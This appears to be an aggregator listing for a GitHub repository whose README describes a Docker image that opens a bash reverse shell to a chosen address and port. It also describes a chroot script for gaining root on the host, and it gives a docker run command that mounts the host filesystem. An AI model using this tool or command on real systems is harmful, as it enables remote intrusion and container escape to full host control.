https://github.com/creekorful/docker-rshell
A docker image that will connect back to given address port with a bash reverse shell.
https://github.com/creekorful/docker-rshell
docker docker-image exploit reverse-shell security
Last synced: about 2 months ago
JSON representation
A docker image that will connect back to given address port with a bash reverse shell.
- Host: GitHub
- URL: https://github.com/creekorful/docker-rshell
- Owner: creekorful
- License: gpl-3.0
- Created: 2020-08-25T11:37:37.000Z (almost 6 years ago)
- Default Branch: master
- Last Pushed: 2020-08-25T12:04:21.000Z (almost 6 years ago)
- Last Synced: 2025-12-27T02:54:06.359Z (6 months ago)
- Topics: docker, docker-image, exploit, reverse-shell, security
- Language: Dockerfile
- Homepage: https://hub.docker.com/r/creekorful/docker-rshell
- Size: 12.7 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: COPYING
Awesome Lists containing this project
README
# Docker reverse shell
A docker image that will connect back to given address port
with a bash reverse shell.
It also contains an useful chroot.sh script
that if the host volume is mounted on /tmp/root, will
give full root access over the host machine.
```sh
docker run -e LHOST=... -e LPORT=... -v /:/mnt/root creekorful/docker-rshell
```